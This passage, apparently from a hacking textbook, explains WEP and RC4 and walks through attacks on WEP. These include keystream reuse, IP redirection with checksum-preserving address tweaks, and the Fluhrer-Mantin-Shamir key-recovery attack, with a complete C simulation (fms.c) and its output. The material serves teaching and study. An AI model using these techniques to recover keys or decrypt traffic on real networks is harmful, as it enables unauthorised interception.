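Now, the plaintext message needs to be encrypted. This is done using RC4, which is a stream cipher. This cipher, initialized with a seed value, can generate a keystream, which is just an arbitrarily long stream of pseudo-random bytes. WEP uses an initialization vector (IV) for the seed value. The IV consists of 24 bits that are generated for each packet. Some older WEP implementations simply use sequential values for the IV, while others use some form of pseudo-randomizer. Regardless of how the 24 bits of IV are chosen, they are prepended to the WEP key. (These 24 bits of IV are included in the WEP key size in a bit of clever marketing spin; when a vendor talks about 64-bit or 128-bit WEP keys, the actual keys are only 40 bits and 104 bits, respectively, combined with 24 bits of IV.) The IV and the WEP key together make up the seed value, which will be called S.

Figure 0x700-3.

Then the seed value S is fed into RC4, which will generate a keystream. This keystream is XORed with the plaintext message P to produce the ciphertext C. The IV is prepended to the ciphertext, and the whole thing is encapsulated with yet another header and sent out over the radio link.

Figure 0x700-4.

When the recipient receives a WEP-encrypted packet, the process is simply reversed. The recipient pulls the IV from the message and then concatenates the IV with his own WEP key to produce a seed value of S. If the sender and receiver both have the same WEP key, the seed values will be the same. This seed is fed into RC4 again to produce the same keystream, which is XORed with the rest of the encrypted message. This will produce the original plaintext message, consisting of the packet message M concatenated with the integrity checksum CS. The recipient then uses the same CRC32 function to recalculate the checksum for M and checks that the calculated value matches the received value of CS. If the checksums match, the packet is passed on. Otherwise, there were too many transmission errors or the WEP keys didn't match, and the packet is dropped.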

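That's basically WEP in a nutshell.

RC4 Stream Cipher

RC4 is a surprisingly simple algorithm. It consists of two algorithms: the Key Scheduling Algorithm (KSA) and the Pseudo-Random Generation Algorithm (PRGA). Both of these algorithms use an 8-by-8 S-box, which is just an array of 256 numbers that are both unique and range in value from 0 to 255. Stated simply, all the numbers from 0 to 255 exist in the array, but they're all mixed up in different ways. The KSA does the initial scrambling of the S-box, based on the seed value fed into it, and the seed can be up to 256 bytes long.

First, the S-box array is filled with sequential values from 0 to 255. This array will be aptly named S. Then, another 256-byte array is filled with the seed value, repeating as necessary until the entire array is filled. This array will be named K. Then the S array is scrambled using the following pseudo-code.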

j = 0;
for i = 0 to 255
{
  j = (j + S[i] + K[i]) mod 256;
  swap S[i] and S[j];
}

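Once that is done, the S-box is all mixed up based on the seed value. That's the key scheduling algorithm. Pretty simple.

Now when keystream data is needed, the Pseudo-Random Generation Algorithm (PRGA) is used. This algorithm has two counters, i and j, which are both initialized at 0 to begin with. After that, for each byte of keystream data, the following pseudo-code is used.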

i = (i + 1) mod 256;
j = (j + S[i]) mod 256;
swap S[i] and S[j];
t = (S[i] + S[j]) mod 256;
Output the value of S[t];

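The outputted byte of S[t] is the first byte of the keystream. This algorithm is repeated for additional keystream bytes.

RC4 is simple enough that it can be easily memorized and implemented on the fly, and it is quite secure if used properly. However, there are a few problems with the way RC4 is used for WEP.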

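WEP Attacks

There are several problems with the security of WEP. In all fairness, it was never meant to be a strong cryptographic protocol, but rather a way to provide a wired equivalency, as alluded to by the acronym. Aside from the security weaknesses relating to association and identities, there are several problems with the cryptographic protocol itself. Some of these problems stem from the use of CRC32 as a checksum function for message integrity, and other problems stem from the way IVs are used.

Offline Brute-Force Attacks

Brute forcing will always be a possible attack on any computationally secure cryptosystem. The only question that remains is whether it's a practical attack or not. With WEP, the actual method of offline brute forcing is simple: capture a few packets, then try to decrypt the packets using every possible key. Next, recalculate the checksum for the packet, and compare this with the original checksum. If they match, then that's most likely the key. Usually, this needs to be done with at least two packets, since it's likely that a single packet can be decrypted with an invalid key yet the checksum will still be valid.

However, under the assumption of 10,000 cracks per second, brute forcing through the 40-bit keyspace would take over three years. Realistically, modern processors can achieve more than 10,000 cracks per second, but even at 200,000 cracks per second, this would take a few months. Depending on the resources and dedication of an attacker, this type of attack may or may not be feasible.

Tim Newsham has provided an effective cracking method that attacks weaknesses in the password-based key-generation algorithm that is used by most 40-bit (marketed as 64-bit) cards and access points. His method effectively reduces the 40-bit keyspace down to 21 bits, which can be cracked in a matter of minutes under the assumption of 10,000 cracks per second (and in a matter of seconds on a modern processor). More information on his methods can be found at www.lava.net/~newsham/wlan.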

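For 104-bit (marketed as 128-bit) WEP networks, brute forcing just isn't feasible.

Keystream Reuse

Another potential problem with WEP lies in keystream reuse. If two plaintexts (P) are XORed with the same keystream to produce two separate ciphertexts (C), XORing those ciphertexts together will cancel out the keystream, resulting in the two plaintexts XORed with each other.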

C₁ = P₁ ⊕ RC4(seed)
C₂ = P₂ ⊕ RC4(seed)
C₁ ⊕ C₂ = [P₁ ⊕ RC4(seed)] ⊕ [P₂ ⊕ RC4(seed)] = P₁ ⊕ P₂

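From here, if one of the plaintexts is known, the other one can easily be recovered. In addition, since the plaintexts in this case are Internet packets with a known and fairly predictable structure, various techniques can be employed to recover both original plaintexts.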

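The initialization vector (IV) is intended to prevent these types of attacks; without it, every packet would be encrypted with the same keystream. If a different IV is used for each packet, the keystreams for the packets will also be different. However, if the same IV is reused, both packets will be encrypted with the same keystream. This condition is easy to detect, since the IVs are included in plaintext in the encrypted packets. Moreover, the IVs used for WEP are only 24 bits long, which nearly guarantees that IVs will be reused. Assuming that IVs are chosen at random, statistically there should be a case of keystream reuse after just 5,000 packets.

This number seems surprisingly small because of a counterintuitive probabilistic phenomenon known as the birthday paradox. The paradox states that if 23 people are in the same room, there is a better than even chance that two of them share a birthday. With 23 people, there are (23 · 22) / 2, or 253, possible pairs. Each pair has a probability of success of 1/365, or about 0.27 percent, which corresponds to a probability of failure of 1 – (1 / 365), or about 99.726 percent. Raising this probability to the power of 253 gives an overall probability of failure of about 49.95 percent, meaning that the probability of success is just a little over 50 percent.

This works the same way with IV collisions. With 5,000 packets, there are (5000 · 4999) / 2, or 12,497,500, possible pairs. Each pair has a probability of failure of 1 – (1 / 2²⁴). When this is raised to the power of the number of possible pairs, the overall probability of failure is about 47.5 percent, meaning that there is a 52.5 percent chance of an IV collision within 5,000 packets:

1 – (1 – 1 / 2²⁴)^12,497,500 ≈ 52.5%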
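The pair-counting estimate used above for both birthdays and IVs can be checked numerically. The function below is a sketch that follows the text's approximation (each pair is treated as independent); the name collision_probability is invented for this example, and the power is computed with a plain loop so that no math library is needed.

```c
/* Probability that at least one pair among n items collides, using the
 * approximation from the text: each of the n(n-1)/2 pairs independently
 * fails to match with probability 1 - 1/space. */
double collision_probability(unsigned long n, double space)
{
    unsigned long pairs = n * (n - 1) / 2;
    double miss = 1.0 - 1.0 / space;
    double all_miss = 1.0;
    unsigned long k;

    for (k = 0; k < pairs; k++)      /* raise miss to the power 'pairs' */
        all_miss *= miss;
    return 1.0 - all_miss;
}
```

collision_probability(23, 365.0) comes out just over 0.50, and collision_probability(5000, 16777216.0), with 16777216 being 2²⁴, comes out at roughly 0.525.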

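After an IV collision is discovered, educated guesses about the structure of the plaintexts can be used to reveal the original plaintexts from the XOR of the two ciphertexts. Also, if one of the plaintexts is known, the other can be recovered with a simple XOR. One method of obtaining known plaintexts might be spam email: the attacker sends the spam, and the victim checks mail over the encrypted wireless connection.

IV-Based Decryption Dictionary Tables

After plaintexts are recovered for an intercepted message, the keystream for that IV is also known. This keystream can be used to decrypt any other packet that uses the same IV, provided the packet is not longer than the recovered keystream. Over time, it is possible to create a table of keystreams indexed by every possible IV. Since there are only 2²⁴ possible IVs, if 1,500 bytes of keystream are saved for each IV, the table would require only about 24GB of storage. Once a table like this is created, all subsequent encrypted packets can be easily decrypted.

Realistically, this method of attack would be very time consuming and tedious. It is an interesting idea, but there are much easier ways to defeat WEP.

IP Redirection

Another way to decrypt encrypted packets is to trick the access point into doing all the work. Usually, wireless access points have some form of Internet connectivity, and if this is the case, an IP redirection attack is possible. First, an encrypted packet is captured, and the destination address is changed to an IP address the attacker controls, without decrypting the packet. Then the modified packet is sent back to the wireless access point, which will decrypt the packet and send it right to the attacker's IP address.

The packet modification is possible because the CRC32 checksum is a linear, unkeyed function. This means that the packet can be strategically modified and the checksum will still come out the same.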
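The linearity claim can be demonstrated directly. The sketch below assumes WEP's checksum is the common CRC-32 variant (reflected polynomial 0xEDB88320, initial value and final XOR of 0xFFFFFFFF); the function name crc32_bitwise is made up for this example. For equal-length messages, the checksum of M XORed with a mask equals CRC(M) ⊕ CRC(mask) ⊕ CRC(all zeros), so anyone who knows the mask can predict how the checksum changes without knowing any key.

```c
#include <stddef.h>
#include <stdint.h>

/* Bitwise CRC-32 (reflected polynomial 0xEDB88320, initial value and
 * final XOR of 0xFFFFFFFF); assumed here to match WEP's checksum. */
uint32_t crc32_bitwise(const uint8_t *data, size_t len)
{
    uint32_t crc = 0xFFFFFFFFu;
    size_t n;
    int bit;

    for (n = 0; n < len; n++) {
        crc ^= data[n];
        for (bit = 0; bit < 8; bit++)
            /* shift right; XOR in the polynomial if the low bit was set */
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return crc ^ 0xFFFFFFFFu;
}
```

A standard sanity check for this CRC variant is that the nine ASCII bytes "123456789" hash to 0xCBF43926.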

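This attack also assumes that the source and destination IP addresses are known. This information is easy enough to figure out from the standard internal network IP addressing schemes alone. A few cases of keystream reuse due to IV collisions can also be used to determine the addresses.

Once the destination IP address is known, this value can be XORed with the desired IP address, and the result can be XORed into place in the encrypted packet. The XOR of the original destination IP address cancels out, leaving behind the desired IP address XORed with the keystream. Then, to ensure that the checksum stays the same, the source IP address must be strategically modified.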
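The XOR-into-place step described above can be sketched as follows. The helper name xor_patch_field and the idea of passing a byte offset are assumptions made for this illustration; a real attack would have to locate the field inside the 802.11 frame.

```c
#include <stddef.h>
#include <stdint.h>

/* Rewrite a known 4-byte field inside a stream-cipher ciphertext without
 * knowing the keystream: XOR (old ^ wanted) into the field's position.
 * (Hypothetical helper; the offset is supplied by the caller.) */
void xor_patch_field(uint8_t *ciphertext, size_t offset,
                     const uint8_t old_value[4], const uint8_t new_value[4])
{
    size_t n;

    for (n = 0; n < 4; n++)
        ciphertext[offset + n] ^= old_value[n] ^ new_value[n];
}
```

Because the ciphertext byte is plaintext ⊕ keystream, XORing in old ⊕ new leaves new ⊕ keystream, so the patched field decrypts to the new address while every other byte is untouched.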

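For example, assume the source address is 192.168.2.57 and the destination address is 192.168.2.1. The attacker controls the address 123.45.67.89 and wants to redirect traffic there. These IP addresses exist in the packet in binary form as high-order and low-order 16-bit words. The conversion is fairly simple:

Src IP = 192.168.2.57

SH = 192 · 256 + 168 = 49320
SL = 2 · 256 + 57 = 569

Dst IP = 192.168.2.1

DH = 192 · 256 + 168 = 49320
DL = 2 · 256 + 1 = 513

New IP = 123.45.67.89

NH = 123 · 256 + 45 = 31533
NL = 67 · 256 + 89 = 17241

The checksum will be changed by NH + NL – DH – DL, so this value must be subtracted from somewhere else in the packet. Since the source address is also known and doesn't matter too much, the low-order 16-bit word of that IP address makes a good target:

S'L = SL – (NH + NL – DH – DL)
S'L = 569 – (31533 + 17241 – 49320 – 513)
S'L = 1628

Since 1628 = 6 · 256 + 92, the new source IP address should be 192.168.6.92. The source IP address can be modified in the encrypted packet using the same XORing trick, and then the checksums should match. When the packet is sent to the wireless access point, it will be decrypted and sent to 123.45.67.89, where the attacker can retrieve it.

If the attacker happens to be able to monitor packets on an entire class B network, the source address doesn't even need to be modified. Assuming the attacker has control over the entire 123.45.X.X IP range, the low-order 16-bit word of the new IP address can be strategically chosen so that it doesn't disturb the checksum. If NL = DH + DL – NH, the checksum won't be changed.

Here's an example:

NL = DH + DL – NH
NL = 49320 + 513 – 31533
NL = 18300

Since 18300 = 71 · 256 + 124, the new destination IP address should be 123.45.71.124.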
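The word conversions and the two compensation formulas above can be computed mechanically from the dotted-quad addresses. The helpers below are a sketch with invented names; they use plain integer arithmetic exactly as the text does and ignore any wraparound that a real 16-bit checksum would apply.

```c
/* Combine two octets of a dotted-quad address into one 16-bit word,
 * e.g. the "192.168" half of 192.168.2.57. */
unsigned int ip_word(unsigned int high_octet, unsigned int low_octet)
{
    return high_octet * 256 + low_octet;
}

/* Adjusted low-order source word: S'L = SL - (NH + NL - DH - DL). */
long compensating_source_low(long sl, long nh, long nl, long dh, long dl)
{
    return sl - (nh + nl - dh - dl);
}

/* Low-order destination word that leaves the sum unchanged:
 * NL = DH + DL - NH. */
long neutral_destination_low(long dh, long dl, long nh)
{
    return dh + dl - nh;
}
```

Dividing a resulting word by 256 gives the third octet of the address, and the remainder gives the fourth.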

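Fluhrer, Mantin, and Shamir Attack

The Fluhrer, Mantin, and Shamir (FMS) attack is the most commonly used attack against WEP, popularized by tools such as AirSnort. This attack is really quite amazing. It takes advantage of weaknesses in the key-scheduling algorithm of RC4 and in the use of IVs.

There are weak IV values that leak information about the secret key in the first byte of the keystream. Since the same key is used over and over with different IVs, if enough packets with weak IVs are collected and the first byte of the keystream is known, the key can be determined. Fortunately, the first byte of an 802.11b packet is the snap header, which is almost always 0xAA. This means the first byte of the keystream can be easily obtained by XORing the first encrypted byte with 0xAA.

Next, weak IVs need to be located. IVs for WEP are 24 bits, which translates to three bytes. Weak IVs are in the form of (A + 3, N – 1, X), where A is the byte of the key to be attacked, N is 256 (since RC4 works in modulo 256), and X can be any value. So, if the zeroth byte of the key is being attacked, there are 256 weak IVs in the form of (3, 255, X), where X ranges from 0 to 255. The bytes of the key must be attacked in order, so the first byte cannot be attacked until the zeroth byte is known.

The algorithm itself is pretty simple. First, it steps through A + 3 steps of the Key Scheduling Algorithm (KSA). This can be done without knowing the key, since the IV occupies the first three bytes of the K array. If the zeroth byte of the key is known and A equals 1, the KSA can be worked to the fourth step, since the first four bytes of the K array will be known.

At this point, if S[0] or S[1] has been disturbed by the last step, the entire attempt should be discarded. More simply stated, if j is less than 2, the attempt should be discarded. Otherwise, take the value of j and the value of S[A + 3], and subtract both of these from the first keystream byte (modulo 256, of course). This value will be the correct key byte about 5 percent of the time and effectively random the rest of the time. If this is done with enough weak IVs (with varying values for X), the correct key byte can be determined. It takes about 60 IVs to bring the probability above 50 percent. After one key byte is determined, the whole process can be repeated to determine the next key byte, until the entire key is revealed.

For the sake of demonstration, RC4 will be scaled back so that N equals 16 instead of 256. This means that everything is modulo 16 instead of 256, and all the arrays are 16 "bytes" consisting of 4 bits each, instead of 256 actual bytes.

Assuming the key is (1, 2, 3, 4, 5) and the zeroth key byte will be attacked, A equals 0. This means the weak IVs should be in the form of (3, 15, X). In this example, X will equal 2, so the seed value will be (3, 15, 2, 1, 2, 3, 4, 5). Using this seed, the first byte of keystream output will be 9.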

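output = 9
A = 0
IV = 3, 15, 2
Key = 1, 2, 3, 4, 5
Seed = IV concatenated with the key
K[] = 3 15 2 X X X X X 3 15 2 X X X X X
S[] = 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

Since the key is currently unknown, the K array is loaded with what is currently known, and the S array is filled with sequential values from 0 to 15. Then j is initialized to 0, and the first three steps of the KSA are done. Remember that all math is done modulo 16.

KSA step one:

i = 0
j = j + S[i] + K[i]
j = 0 + 0 + 3 = 3
Swap S[i] and S[j]
K[] = 3 15 2 X X X X X 3 15 2 X X X X X
S[] = 3 1 2 0 4 5 6 7 8 9 10 11 12 13 14 15

KSA step two:

i = 1
j = j + S[i] + K[i]
j = 3 + 1 + 15 = 3
Swap S[i] and S[j]
K[] = 3 15 2 X X X X X 3 15 2 X X X X X
S[] = 3 0 2 1 4 5 6 7 8 9 10 11 12 13 14 15

KSA step three:

i = 2
j = j + S[i] + K[i]
j = 3 + 2 + 2 = 7
Swap S[i] and S[j]
K[] = 3 15 2 X X X X X 3 15 2 X X X X X
S[] = 3 0 7 1 4 5 6 2 8 9 10 11 12 13 14 15

At this point, j is not less than 2, so the process can continue. S[3] is 1, j is 7, and the first byte of keystream output was 9. So the zeroth byte of the key should be 9 – 7 – 1 = 1.

This information can be used to determine the next byte of the key, using IVs in the form of (4, 15, X) and working the KSA through to the fourth step. Using the IV (4, 15, 9), the first byte of keystream is 6.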

output = 6
A = 1
IV = 4, 15, 9
Key = 1, 2, 3, 4, 5
Seed = IV concatenated with the key
K[] = 4 15 9 1 X X X X 4 15 9 1 X X X X
S[] = 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

KSA step one:

i = 0
j = j + S[i] + K[i]
j = 0 + 0 + 4 = 4
Swap S[i] and S[j]
K[] = 4 15 9 1 X X X X 4 15 9 1 X X X X
S[] = 4 1 2 3 0 5 6 7 8 9 10 11 12 13 14 15

KSA step two:

i = 1
j = j + S[i] + K[i]
j = 4 + 1 + 15 = 4
Swap S[i] and S[j]
K[] = 4 15 9 1 X X X X 4 15 9 1 X X X X
S[] = 4 0 2 3 1 5 6 7 8 9 10 11 12 13 14 15

KSA step three:

i = 2
j = j + S[i] + K[i]
j = 4 + 2 + 9 = 15
Swap S[i] and S[j]
K[] = 4 15 9 1 X X X X 4 15 9 1 X X X X
S[] = 4 0 15 3 1 5 6 7 8 9 10 11 12 13 14 2

KSA step four:

i = 3
j = j + S[i] + K[i]
j = 15 + 3 + 1 = 3
Swap S[i] and S[j]
K[] = 4 15 9 1 X X X X 4 15 9 1 X X X X
S[] = 4 0 15 3 1 5 6 7 8 9 10 11 12 13 14 2
output – j – S[4] = key[1]
6 – 3 – 1 = 2
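The two scaled-down examples above can be replayed in C. This is a sketch for the N = 16 toy cipher only, with invented function names: rc4_first_output() plays the victim who knows the whole seed, and fms_guess() plays the attacker who knows only the IV and the key values recovered so far.

```c
#define N 16   /* scaled-down RC4: all arithmetic is modulo 16 */

/* Full scaled-down RC4: run the KSA over an 8-value seed (3 IV values
 * followed by 5 key values) and return the first keystream value. */
int rc4_first_output(const int seed[8])
{
    int S[N], i, j = 0, t;

    for (i = 0; i < N; i++)
        S[i] = i;
    for (i = 0; i < N; i++) {
        j = (j + S[i] + seed[i % 8]) % N;   /* seed repeats to fill K[] */
        t = S[i]; S[i] = S[j]; S[j] = t;
    }
    i = 1;                                   /* first PRGA step */
    j = S[i] % N;
    t = S[i]; S[i] = S[j]; S[j] = t;
    return S[(S[i] + S[j]) % N];
}

/* Attacker's view: run only the first A + 3 KSA steps using the IV and
 * the key values already recovered (known[] holds A + 3 values), then
 * guess key value A. Returns -1 when j < 2 and the attempt is discarded. */
int fms_guess(const int known[], int A, int first_output)
{
    int S[N], i, j = 0, t;

    for (i = 0; i < N; i++)
        S[i] = i;
    for (i = 0; i < A + 3; i++) {
        j = (j + S[i] + known[i]) % N;
        t = S[i]; S[i] = S[j]; S[j] = t;
    }
    if (j < 2)
        return -1;
    return ((first_output - j - S[A + 3]) % N + N) % N;
}
```

With the seed (3, 15, 2, 1, 2, 3, 4, 5), rc4_first_output() gives 9 and fms_guess() with A = 0 gives 1. With the seed (4, 15, 9, 1, 2, 3, 4, 5), the output is 6 and the guess for A = 1 is 2, matching the hand calculation.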

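Once again, the correct key byte is determined. Of course, for the sake of demonstration, the values for X have been strategically picked. To give you a true sense of the statistical nature of the attack against a full RC4 implementation, the following source code has been included: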

fms.c

#include <stdio.h>
#include <stdlib.h>  /* for exit() and atoi() */

/* RC4 stream cipher */
int RC4(int *IV, int *key) {
   int K[256];
   int S[256];
   int seed[16];
   int i, j, k, t;

   //Seed = IV + key;
   for(k=0; k<3; k++)
      seed[k] = IV[k];
   for(k=0; k<13; k++)
      seed[k+3] = key[k];

   // -= Key Scheduling Algorithm (KSA) =-
   //Initialize the arrays.
   for(k=0; k<256; k++) {
      S[k] = k;
      K[k] = seed[k%16];
   }

   j=0;
   for(i=0; i < 256; i++) {
      j = (j + S[i] + K[i])%256;
      t=S[i]; S[i]=S[j]; S[j]=t; // Swap(S[i], S[j]);
   }

   // First step of PRGA for first keystream byte
   i = 0;
   j = 0;

   i = i + 1;
   j = j + S[i];

   t=S[i]; S[i]=S[j]; S[j]=t; // Swap(S[i], S[j]);

   k = (S[i] + S[j])%256;

   return S[k];
}

int main(int argc, char *argv[]) {
  int K[256];
  int S[256];

  int IV[3];
  int key[13] = {1, 2, 3, 4, 5, 66, 75, 123, 99, 100, 123, 43, 213};
  int seed[16];
  int N = 256;
  int i, j, k, t, x, A;
  int keystream, keybyte;

  int max_result, max_count;
  int results[256];

  int known_j, known_S;

  if(argc < 2) {
    printf("Usage: %s <keybyte to attack>\n", argv[0]);
    exit(0);
  }
    A = atoi(argv[1]);
    if((A > 12) || (A < 0)) {
      printf("keybyte must be from 0 to 12.\n");
      exit(0);
    }

  for(k=0; k < 256; k++)
    results[k] = 0;

  IV[0] = A + 3;
  IV[1] = N - 1;

  for(x=0; x < 256; x++) {
    IV[2] = x;

    keystream = RC4(IV, key);
    printf("Using IV: (%d, %d, %d), first keystream byte is %u\n",
        IV[0], IV[1], IV[2], keystream);

    printf("Doing the first %d steps of KSA..  ", A+3);

    //Seed = IV + key;
    for(k=0; k<3; k++)
      seed[k] = IV[k];
    for(k=0; k<13; k++)
      seed[k+3] = key[k];

    // -= Key Scheduling Algorithm (KSA) =-
    //Initialize the arrays.
    for(k=0; k<256; k++) {
      S[k] = k;
      K[k] = seed[k%16];
    }

    j=0;
    for(i=0; i < (A + 3); i++) {
      j = (j + S[i] + K[i])%256;
      t = S[i];
      S[i] = S[j];
      S[j] = t;
    }

    if(j < 2) {  // If j < 2, then S[0] or S[1] have been disturbed.
      printf("S[0] or S[1] have been disturbed, discarding..\n");
    } else {
      known_j = j;
      known_S = S[A+3];
      printf("at KSA iteration #%d, j=%d and S[%d]=%d\n",
          A+3, known_j, A+3, known_S);
      keybyte = keystream - known_j - known_S;

      while(keybyte < 0)
        keybyte = keybyte + 256;
      printf("key[%d] prediction = %d - %d - %d = %d\n",
          A, keystream, known_j, known_S, keybyte);
      results[keybyte] = results[keybyte] + 1;
    }
  }
  max_result = -1;
  max_count = 0;

  for(k=0; k < 256; k++) {
    if(max_count < results[k]) {
      max_count = results[k];
      max_result = k;
    }
  }
  printf("\nFrequency table for key[%d] (* = most frequent)\n", A);
  for(k=0; k < 32; k++) {
    for(i=0; i < 8; i++) {
      t = k+i*32;
      if(max_result == t)
        printf("%3d %2d*| ", t, results[t]);
      else
        printf("%3d %2d | ", t, results[t]);
    }
    printf("\n");
  }

  printf("\n[Actual Key] = (");
  for(k=0; k < 12; k++)
    printf("%d, ",key[k]);
  printf("%d)\n", key[12]);

  printf("key[%d] is probably %d\n", A, max_result); 
}

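This code performs the FMS attack on 128-bit WEP (104-bit key, 24-bit IV), using every possible value of X. The key byte to attack is the only argument, and the key is hard-coded into the key array. The following output shows the compilation and execution of the fms.c code to crack an RC4 key.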

reader@hacking:~/booksrc $ gcc -o fms fms.c
reader@hacking:~/booksrc $ ./fms
Usage: ./fms <keybyte to attack>
reader@hacking:~/booksrc $ ./fms 0
Using IV: (3, 255, 0), first keystream byte is 7
Doing the first 3 steps of KSA..  at KSA iteration #3, j=5 and S[3]=1
key[0] prediction = 7 - 5 - 1 = 1
Using IV: (3, 255, 1), first keystream byte is 211
Doing the first 3 steps of KSA..  at KSA iteration #3, j=6 and S[3]=1
key[0] prediction = 211 - 6 - 1 = 204
Using IV: (3, 255, 2), first keystream byte is 241
Doing the first 3 steps of KSA..  at KSA iteration #3, j=7 and S[3]=1
key[0] prediction = 241 - 7 - 1 = 233

.:[ output trimmed ]:.

Using IV: (3, 255, 252), first keystream byte is 175
Doing the first 3 steps of KSA..  S[0] or S[1] have been disturbed, discarding..
Using IV: (3, 255, 253), first keystream byte is 149
Doing the first 3 steps of KSA..  at KSA iteration #3, j=2 and S[3]=1
key[0] prediction = 149 - 2 - 1 = 146
Using IV: (3, 255, 254), first keystream byte is 253
Doing the first 3 steps of KSA..  at KSA iteration #3, j=3 and S[3]=2
key[0] prediction = 253 - 3 - 2 = 248
Using IV: (3, 255, 255), first keystream byte is 72
Doing the first 3 steps of KSA..  at KSA iteration #3, j=4 and S[3]=1
key[0] prediction = 72 - 4 - 1 = 67

Frequency table for key[0] (* = most frequent)
  0  1 |  32  3 |  64  0 |  96  1 | 128  2 | 160  0 | 192  1 | 224  3 |
  1 10*|  33  0 |  65  1 |  97  0 | 129  1 | 161  1 | 193  1 | 225  0 |
  2  0 |  34  1 |  66  0 |  98  1 | 130  1 | 162  1 | 194  1 | 226  1 |
  3  1 |  35  0 |  67  2 |  99  1 | 131  1 | 163  0 | 195  0 | 227  1 |
  4  0 |  36  0 |  68  0 | 100  1 | 132  0 | 164  0 | 196  2 | 228  0 |
  5  0 |  37  1 |  69  0 | 101  1 | 133  0 | 165  2 | 197  2 | 229  1 |
  6  0 |  38  0 |  70  1 | 102  3 | 134  2 | 166  1 | 198  1 | 230  2 |
  7  0 |  39  0 |  71  2 | 103  0 | 135  5 | 167  3 | 199  2 | 231  0 |
  8  3 |  40  0 |  72  1 | 104  0 | 136  1 | 168  0 | 200  1 | 232  1 |
  9  1 |  41  0 |  73  0 | 105  0 | 137  2 | 169  1 | 201  3 | 233  2 |
 10  1 |  42  3 |  74  1 | 106  2 | 138  0 | 170  1 | 202  3 | 234  0 |
 11  1 |  43  2 |  75  1 | 107  2 | 139  1 | 171  1 | 203  0 | 235  0 |
 12  0 |  44  1 |  76  0 | 108  0 | 140  2 | 172  1 | 204  1 | 236  1 |
 13  2 |  45  2 |  77  0 | 109  0 | 141  0 | 173  2 | 205  1 | 237  0 |
 14  0 |  46  0 |  78  2 | 110  2 | 142  2 | 174  1 | 206  0 | 238  1 |
 15  0 |  47  3 |  79  1 | 111  2 | 143  1 | 175  0 | 207  1 | 239  1 |
 16  1 |  48  1 |  80  1 | 112  0 | 144  2 | 176  0 | 208  0 | 240  0 |
 17  0 |  49  0 |  81  1 | 113  1 | 145  1 | 177  1 | 209  0 | 241  1 |
 18  1 |  50  0 |  82  0 | 114  0 | 146  4 | 178  1 | 210  1 | 242  0 |
 19  2 |  51  0 |  83  0 | 115  0 | 147  1 | 179  0 | 211  1 | 243  0 |
 20  3 |  52  0 |  84  3 | 116  1 | 148  2 | 180  2 | 212  2 | 244  3 |
 21  0 |  53  0 |  85  1 | 117  2 | 149  2 | 181  1 | 213  0 | 245  1 |
 22  0 |  54  3 |  86  3 | 118  0 | 150  2 | 182  2 | 214  0 | 246  3 |
 23  2 |  55  0 |  87  0 | 119  2 | 151  2 | 183  1 | 215  1 | 247  2 |
 24  1 |  56  2 |  88  3 | 120  1 | 152  2 | 184  1 | 216  0 | 248  2 |
 25  2 |  57  2 |  89  0 | 121  1 | 153  2 | 185  0 | 217  1 | 249  3 |
 26  0 |  58  0 |  90  0 | 122  0 | 154  1 | 186  1 | 218  0 | 250  1 |
 27  0 |  59  2 |  91  1 | 123  3 | 155  2 | 187  1 | 219  1 | 251  1 |
 28  2 |  60  1 |  92  1 | 124  0 | 156  0 | 188  0 | 220  0 | 252  3 |
 29  1 |  61  1 |  93  1 | 125  0 | 157  0 | 189  0 | 221  0 | 253  1 |
 30  0 |  62  1 |  94  0 | 126  1 | 158  1 | 190  0 | 222  1 | 254  0 |
 31  0 |  63  0 |  95  1 | 127  0 | 159  0 | 191  0 | 223  0 | 255  0 |

[Actual Key] = (1, 2, 3, 4, 5, 66, 75, 123, 99, 100, 123, 43, 213)
key[0] is probably 1
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $ ./fms 12
Using IV: (15, 255, 0), first keystream byte is 81
Doing the first 15 steps of KSA..  at KSA iteration #15, j=251 and S[15]=1
key[12] prediction = 81 - 251 - 1 = 85
Using IV: (15, 255, 1), first keystream byte is 80
Doing the first 15 steps of KSA..  at KSA iteration #15, j=252 and S[15]=1
key[12] prediction = 80 - 252 - 1 = 83
Using IV: (15, 255, 2), first keystream byte is 159
Doing the first 15 steps of KSA..  at KSA iteration #15, j=253 and S[15]=1
key[12] prediction = 159 - 253 - 1 = 161

.:[ output trimmed ]:.

Using IV: (15, 255, 252), first keystream byte is 238
Doing the first 15 steps of KSA..  at KSA iteration #15, j=236 and S[15]=1
key[12] prediction = 238 - 236 - 1 = 1
Using IV: (15, 255, 253), first keystream byte is 197
Doing the first 15 steps of KSA..  at KSA iteration #15, j=236 and S[15]=1
key[12] prediction = 197 - 236 - 1 = 216
Using IV: (15, 255, 254), first keystream byte is 238
Doing the first 15 steps of KSA..  at KSA iteration #15, j=249 and S[15]=2
key[12] prediction = 238 - 249 - 2 = 243
Using IV: (15, 255, 255), first keystream byte is 176
Doing the first 15 steps of KSA..  at KSA iteration #15, j=250 and S[15]=1
key[12] prediction = 176 - 250 - 1 = 181

Frequency table for key[12] (* = most frequent)
  0  1 |  32  0 |  64  2 |  96  0 | 128  1 | 160  1 | 192  0 | 224  2 |
  1  2 |  33  1 |  65  0 |  97  2 | 129  1 | 161  1 | 193  0 | 225  0 |
  2  0 |  34  2 |  66  2 |  98  0 | 130  2 | 162  3 | 194  2 | 226  0 |
  3  2 |  35  0 |  67  2 |  99  2 | 131  0 | 163  1 | 195  0 | 227  5 |
  4  0 |  36  0 |  68  0 | 100  1 | 132  0 | 164  0 | 196  1 | 228  1 |
  5  3 |  37  0 |  69  3 | 101  2 | 133  0 | 165  2 | 197  0 | 229  3 |
  6  1 |  38  2 |  70  2 | 102  0 | 134  0 | 166  2 | 198  0 | 230  2 |
  7  2 |  39  0 |  71  1 | 103  0 | 135  0 | 167  3 | 199  1 | 231  1 |
  8  1 |  40  0 |  72  0 | 104  1 | 136  1 | 168  2 | 200  0 | 232  0 |
  9  0 |  41  1 |  73  0 | 105  0 | 137  1 | 169  1 | 201  1 | 233  1 |
 10  2 |  42  2 |  74  0 | 106  4 | 138  2 | 170  0 | 202  1 | 234  0 |
 11  3 |  43  1 |  75  0 | 107  1 | 139  3 | 171  2 | 203  1 | 235  0 |
 12  2 |  44  0 |  76  0 | 108  2 | 140  2 | 172  0 | 204  0 | 236  1 |
 13  0 |  45  0 |  77  0 | 109  1 | 141  1 | 173  0 | 205  2 | 237  4 |
 14  1 |  46  1 |  78  1 | 110  0 | 142  3 | 174  1 | 206  0 | 238  1 |
 15  1 |  47  2 |  79  1 | 111  0 | 143  0 | 175  1 | 207  2 | 239  0 |
